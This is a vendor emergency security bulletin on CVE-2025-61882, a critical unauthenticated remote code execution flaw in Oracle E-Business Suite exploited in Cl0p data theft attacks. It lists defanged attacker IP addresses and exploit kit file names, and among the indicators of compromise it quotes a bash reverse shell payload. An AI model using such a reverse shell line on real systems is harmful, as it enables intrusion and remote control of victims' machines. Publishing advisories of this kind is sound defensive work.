Security Bulletin: Oracle E-Business Suite Concurrent Processing (BI Publisher Integration) Remote Code Execution Vulnerability

About:

RedLegg will occasionally communicate vulnerabilities released outside the usual release schedule to provide additional value to our customers. These emergency bulletins describe vulnerabilities or threats we classify as the highest severity level and warrant out-of-band emergency patching or mitigation action.

VULNERABILITIES

Oracle E-Business Suite Concurrent Processing (BI Publisher Integration) Remote Code Execution Vulnerability 

CVSS Score: 9.8 (Critical)
Identifier: CVE-2025-61882  
Exploit or Proof of Concept (PoC): Yes — public proof-of-concept exploit patterns and indicators have been disclosed.
Update: CVE-2025-61882 – Oracle Security Alert 

Description:  

CVE-2025-61882 is a critical vulnerability in Oracle E-Business Suite (EBS) affecting the Concurrent Processing component tied to BI Publisher integration. The flaw allows remote code execution without authentication via HTTP, enabling an attacker with network access to execute arbitrary code on vulnerable installations. This vulnerability has been actively exploited in Cl0p-backed data exfiltration attacks targeting EBS environments.

Indicators of Compromise (IoCs) reported include:

• IP addresses: 200.107.207[.]26 and 185.181.60[.]11 used for GET/POST activity in exploit campaigns.
  
  
• Attack payloads such as “sh -c /bin/bash -i >& /dev/tcp//0>&1” used to establish outbound connections.
  
  
• Artifacts named similar to “oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip”, “exp.py”, “server.py” found in exploit kits.
  
  

Mitigation Recommendation:   

Patching is currently the only reliable mitigation. Apply Oracle’s emergency update for CVE-2025-61882 immediately, adhering to any required prerequisites (e.g., the October 2023 Critical Patch Update). 

Restrict or monitor HTTP access to Oracle EBS endpoints until patches are verified.